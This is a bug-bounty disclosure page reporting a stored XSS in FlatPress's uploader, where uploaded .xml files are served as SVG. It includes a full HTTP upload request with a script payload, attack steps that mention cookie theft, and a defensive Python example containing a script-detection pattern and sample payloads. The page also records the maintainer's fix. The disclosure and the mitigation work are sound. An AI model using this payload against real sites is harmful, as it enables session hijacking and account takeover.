Stored XSS via XML File in flatpressblog/flatpress


Reported on Dec 24th 2022


When a user uploads a file with a .xml extension and then requests that file directly, the server responds with Content-Type: image/svg+xml. The browser therefore parses the XML as an SVG document in the site's origin and executes any script element it contains, so the upload becomes a stored XSS.


POST /flatpress-master/admin.php?p=uploader&action=default HTTP/1.1
Host: localhost
Content-Length: 639
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMXzGcbIqZ5KtoAKf
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cookie: fpuser_fp-a37b0eea=admin; fppass_fp-a37b0eea=%242y%2410%2463YIyEccoLYf6kU0s.2lb.D1GcJ7GsnvoWR.aiWBX5alwZmXZpiMK; PHPSESSID=69js8mspjvh35iaud5vsb2sdfq; security_level=0; fpsess_fp-a37b0eea=81ft5fe9s1evbo5kaovh623v8u

------WebKitFormBoundaryMXzGcbIqZ5KtoAKf
Content-Disposition: form-data; name="_wpnonce"

------WebKitFormBoundaryMXzGcbIqZ5KtoAKf
Content-Disposition: form-data; name="_wp_http_referer"

------WebKitFormBoundaryMXzGcbIqZ5KtoAKf
Content-Disposition: form-data; name="upload[]"; filename="xss.xml"
Content-Type: image/svg+xml

<something:script xmlns:something="">alert(document.domain)</something:script>
------WebKitFormBoundaryMXzGcbIqZ5KtoAKf
Content-Disposition: form-data; name="upload"

------WebKitFormBoundaryMXzGcbIqZ5KtoAKf--

Steps to take

  1. Log in and open /admin.php?p=uploader&action=default
  2. Upload an .xml file containing malicious JavaScript (for example, code that steals the user's cookies).
  3. Request the uploaded file directly; it is served as image/svg+xml and the embedded script runs in the site's origin.


This vulnerability allows arbitrary JavaScript execution in the victim's browser within the site's origin: stealing the user's cookies, issuing HTTP requests as the user, reading the content of same-origin pages, and so on.
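The root cause described above is not the .xml extension itself but the decision to serve a user upload inline with an active content type. The following is an added example, written for this page and not FlatPress's own code, showing the two checks a practitioner would want on the serving side: forcing any upload that a browser would parse as a document (XML, SVG, HTML, JavaScript) to be delivered as a download with nosniff, and, as defense in depth, scanning XML uploads for script content before accepting them. All function and constant names are this example's own; PAGE_PAYLOAD is the body from the request above, the other sample inputs are constructed.

```python
"""Added example (not FlatPress code): serve uploads so an .xml/.svg file
cannot execute script in the site's origin, and scan XML uploads for
script content as defense in depth."""
import mimetypes
import os
import re
import xml.etree.ElementTree as ET

# Extensions a browser parses as an active document when served inline from
# the same origin. FlatPress served .xml as image/svg+xml, which is exactly
# this class of file. Anything here is delivered as a download instead.
ACTIVE_EXTENSIONS = {"xml", "svg", "svgz", "html", "htm", "xhtml", "xht", "js", "mhtml"}
ACTIVE_TYPES = {
    "image/svg+xml", "text/html", "application/xhtml+xml", "text/xml",
    "application/xml", "text/javascript", "application/javascript",
}

# Matches <script ...> and <anyprefix:script ...>, whatever the namespace
# declaration says; this catches the report's payload without parsing.
SCRIPT_TAG = re.compile(rb"<\s*(?:[A-Za-z_][\w.\-]*:)?script\b", re.IGNORECASE)
EVENT_HANDLER = re.compile(r"^on[a-z]+$", re.IGNORECASE)


def headers_for_upload(filename: str) -> dict[str, str]:
    """Response headers for serving a stored upload back to a browser."""
    safe_name = os.path.basename(filename)
    for ch in ('"', "\r", "\n"):          # keep the filename out of header injection
        safe_name = safe_name.replace(ch, "")
    ext = os.path.splitext(safe_name)[1].lower().lstrip(".")
    guessed = mimetypes.guess_type(safe_name)[0] or "application/octet-stream"
    headers = {"X-Content-Type-Options": "nosniff"}   # stop sniffing back to HTML/SVG
    if ext in ACTIVE_EXTENSIONS or guessed in ACTIVE_TYPES:
        headers["Content-Type"] = "application/octet-stream"
        headers["Content-Disposition"] = f'attachment; filename="{safe_name}"'
    else:
        headers["Content-Type"] = guessed
        headers["Content-Disposition"] = f'inline; filename="{safe_name}"'
    return headers


def xml_upload_verdict(data: bytes) -> tuple[bool, str]:
    """Defense in depth for XML/SVG uploads. Returns (accepted, reason).
    Fails closed when the document does not parse, since a browser may be
    more lenient than the server-side parser."""
    m = SCRIPT_TAG.search(data)
    if m:
        return False, f"script element found: {m.group(0).decode('ascii', 'replace')}"
    try:
        root = ET.fromstring(data)   # prefer defusedxml for untrusted input in production
    except ET.ParseError as exc:
        return False, f"not well-formed XML, rejected: {exc}"
    for el in root.iter():
        local = el.tag.rsplit("}", 1)[-1].lower()   # strip {namespace}
        if local == "script":
            return False, f"script element found: {el.tag}"
        for attr, value in el.attrib.items():
            if EVENT_HANDLER.match(attr.rsplit("}", 1)[-1]):
                return False, f"event handler attribute {attr} on <{el.tag}>"
            if value.strip().lower().startswith("javascript:"):
                return False, f"javascript: URL in {attr} on <{el.tag}>"
    return True, "no script content found"


# PAGE_PAYLOAD is the upload body from the report; the other two are constructed.
PAGE_PAYLOAD = b'<something:script xmlns:something="">alert(document.domain)</something:script>'
SVG_PAYLOAD = b'<svg xmlns="http://www.w3.org/2000/svg"><a href="javascript:alert(1)">x</a></svg>'
BENIGN_XML = b'<?xml version="1.0"?><feed><title>hello</title></feed>'

if __name__ == "__main__":
    for name in ("xss.xml", "logo.svg", "photo.png"):
        print(name, headers_for_upload(name))
    for sample in (PAGE_PAYLOAD, SVG_PAYLOAD, BENIGN_XML):
        print(xml_upload_verdict(sample))
```

The header function is the actual fix: once .xml and .svg uploads are served as application/octet-stream with Content-Disposition: attachment and X-Content-Type-Options: nosniff, the browser never evaluates their script in the site's origin, regardless of what the file contains. The scan is only a second layer; a blocklist of script elements, on* attributes and javascript: URLs will not catch every active-content vector in SVG, so it must not replace the download-only serving rule.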

We are processing your report and will contact the flatpressblog/flatpress team within 24 hours. a year ago
We have contacted a member of the flatpressblog/flatpress team and are waiting to hear back a year ago
flatpressblog/flatpress maintainer validated this vulnerability a year ago

Learned that Markdown may contain JS as well - thanks!

juylang has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
flatpressblog/flatpress maintainer marked this as fixed in 1.3 with commit 3cc223 a year ago
The fix bounty has been dropped
Juy Lang
a year ago


Can you help me designate the vulnerability as a CVE?

This vulnerability has now been published a year ago